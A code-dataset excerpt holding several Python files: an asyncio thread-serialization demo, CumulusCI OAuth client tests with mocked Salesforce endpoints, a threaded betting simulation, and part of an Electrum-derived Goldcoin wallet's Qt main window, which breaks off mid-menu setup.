source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
custom_loop.py
|
import asyncio
import logging
# Logging setup
import threading
import time
from concurrent.futures import ThreadPoolExecutor
class AsyncioLoggingFilter(logging.Filter):
def filter(self, record):
task = asyncio.Task.current_task()
record.task = f'[task {id(task)}]' if task else '[NOLOOP ]'
return True
logger = logging.getLogger(__name__)
logger.addFilter(AsyncioLoggingFilter())
logging.getLogger('asyncio').setLevel(logging.CRITICAL)
logging.basicConfig(level=logging.INFO, format="%(msecs)f %(threadName)s %(task)s %(msg)s")
thread_pool_executor = ThreadPoolExecutor(thread_name_prefix="dispatch")
class ThreadSerializedTask(asyncio.Task):
_lock = threading.Lock()
def _wakeup(self, *args, **kwargs):
logger.debug("Acquire lock")
ThreadSerializedTask._lock.acquire()
super()._wakeup(*args, **kwargs)
logger.debug("Releasing lock")
ThreadSerializedTask._lock.release()
def task_factory(loop, coro):
return ThreadSerializedTask(coro, loop=loop)
async def one():
await asyncio.sleep(0.01)
logger.debug("-> One")
await two()
await asyncio.sleep(0.01)
logger.debug("-> Exiting one")
async def two():
await asyncio.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
time.sleep(0.01)
logger.info("--> Should not be interleaved with other threads")
def run_loop():
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
loop.run_until_complete(one())
if __name__ == '__main__':
threads = []
for _ in range(0, 5):
thread = threading.Thread(target=run_loop)
thread.start()
threads.append(thread)
[t.join() for t in threads]
|
test_client.py
|
import http.client
import pytest
import responses
import ssl
import sys
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from contextlib import contextmanager
from requests.models import Response
from unittest import mock
from cumulusci.core.exceptions import SalesforceCredentialsException
from cumulusci.core.keychain.base_project_keychain import DEFAULT_CONNECTED_APP_PORT
from cumulusci.oauth.client import OAuth2Client
from cumulusci.oauth.client import PORT_IN_USE_ERR
from cumulusci.oauth.exceptions import OAuth2Error
from cumulusci.oauth.salesforce import jwt_session
@responses.activate
@mock.patch("cumulusci.oauth.salesforce.jwt.encode")
def test_jwt_session(encode):
# Mock the call to encode so we don't need
# to generate a private key that would be committed
error = "Yeti"
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
body=error,
status=400,
)
with pytest.raises(
SalesforceCredentialsException, match=f"Error retrieving access token: {error}"
):
jwt_session("client_id", "server_key", "username")
@pytest.fixture
def client_config():
return {
"client_id": "foo_id",
"client_secret": "foo_secret",
"auth_uri": "https://login.salesforce.com/services/oauth2/authorize",
"token_uri": "https://login.salesforce.com/services/oauth2/token",
"redirect_uri": "http://localhost:7788/callback",
"scope": "web full refresh_token",
"prompt": "login",
}
@pytest.fixture
def client(client_config):
return OAuth2Client(client_config)
@pytest.fixture
def http_client(client_config):
client_config = client_config.copy()
client_config["redirect_uri"] = "http://localhost:8080/callback"
return OAuth2Client(client_config)
@contextmanager
@mock.patch("time.sleep", time.sleep) # undo mock from conftest
def httpd_thread(oauth_client):
# call OAuth object on another thread - this spawns local httpd
thread = threading.Thread(target=oauth_client.auth_code_flow)
thread.start()
while thread.is_alive():
if oauth_client.httpd:
break
time.sleep(0.01)
assert (
oauth_client.httpd
), "HTTPD did not start. Perhaps port 8080 cannot be accessed."
try:
yield oauth_client
finally:
oauth_client.httpd.shutdown()
thread.join()
@mock.patch("webbrowser.open", mock.MagicMock(return_value=None))
class TestOAuth2Client:
@responses.activate
def test_refresh_token(self, client):
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
body=b'{"message":"SENTINEL"}',
)
info = client.refresh_token("token")
assert "SENTINEL" == info["message"]
@responses.activate
def test_auth_code_flow___http(self, http_client):
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(http_client) as oauth_client:
# simulate callback from browser
response = urllib.request.urlopen(
http_client.client_config.redirect_uri + "?code=123"
)
assert oauth_client.response.json() == expected_response
assert b"Congratulations" in response.read()
@responses.activate
def test_auth_code_flow___https(self, client):
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# use https for callback
client.client_config.redirect_uri = "https://localhost:8080/callback"
# squash CERTIFICATE_VERIFY_FAILED from urllib
# https://stackoverflow.com/questions/49183801/ssl-certificate-verify-failed-with-urllib
ssl._create_default_https_context = ssl._create_unverified_context
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client) as oauth_client:
# simulate callback from browser
response = urllib.request.urlopen(
oauth_client.client_config.redirect_uri + "?code=123"
)
assert oauth_client.response.json() == expected_response
assert b"Congratulations" in response.read()
@responses.activate
def test_oauth_flow_error_from_auth(self, client):
# mock response for SalesforceOAuth2.get_token()
expected_response = {
"access_token": "abc123",
"id_token": "abc123",
"token_type": "Bearer",
"signature": "abc123",
"issued_at": "12345",
"scope": "web full refresh_token",
"instance_url": "https://na15.salesforce.com",
"id": "https://login.salesforce.com/id/abc/xyz",
"refresh_token": "abc123",
}
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.OK,
json=expected_response,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client):
# simulate callback from browser
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(
client.client_config.redirect_uri
+ "?error=123&error_description=broken"
)
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="setup differs from windows"
)
def test_create_httpd__port_already_in_use(self, client):
with httpd_thread(client):
with pytest.raises(
OAuth2Error, match=PORT_IN_USE_ERR.format(DEFAULT_CONNECTED_APP_PORT)
):
client._create_httpd()
@mock.patch("cumulusci.oauth.client.HTTPServer")
def test_create_httpd__other_OSError(self, HTTPServer, client):
message = "generic error message"
HTTPServer.side_effect = OSError(message)
with pytest.raises(OSError, match=message):
client._create_httpd()
@responses.activate
def test_oauth_flow_error_from_token(self, client):
# mock response for OAuth2Client.get_access_token()
responses.add(
responses.POST,
"https://login.salesforce.com/services/oauth2/token",
status=http.client.FORBIDDEN,
)
# call OAuth object on another thread - this spawns local httpd
with httpd_thread(client):
# simulate callback from browser
with pytest.raises(urllib.error.HTTPError):
urllib.request.urlopen(client.client_config.redirect_uri + "?code=123")
def test_validate_response__raises_error(self, client):
response = Response()
response.status_code = 400
with pytest.raises(OAuth2Error):
client.validate_response(response)
|
table.py
|
import threading
import Queue
from gamblers.simple_bettor import simple_bettor
from gamblers.double_bettor import double_bettor
from gamblers.dAlembert import dAlembert
def table(args):
'''
Simple table for gamblers
'''
pool = []
queue = Queue.Queue()
player_results = []
players_at_table = args[4]
for i in range(players_at_table):
t = threading.Thread(target=dAlembert, args=(args, queue))
pool.append(t)
t.start()
response = queue.get()
player_results.append(response)
for thread in pool:
thread.join()
return player_results
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError, parse_max_spend)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnInvoiceException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit, SizedFreezableLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-GLC"
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Goldcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
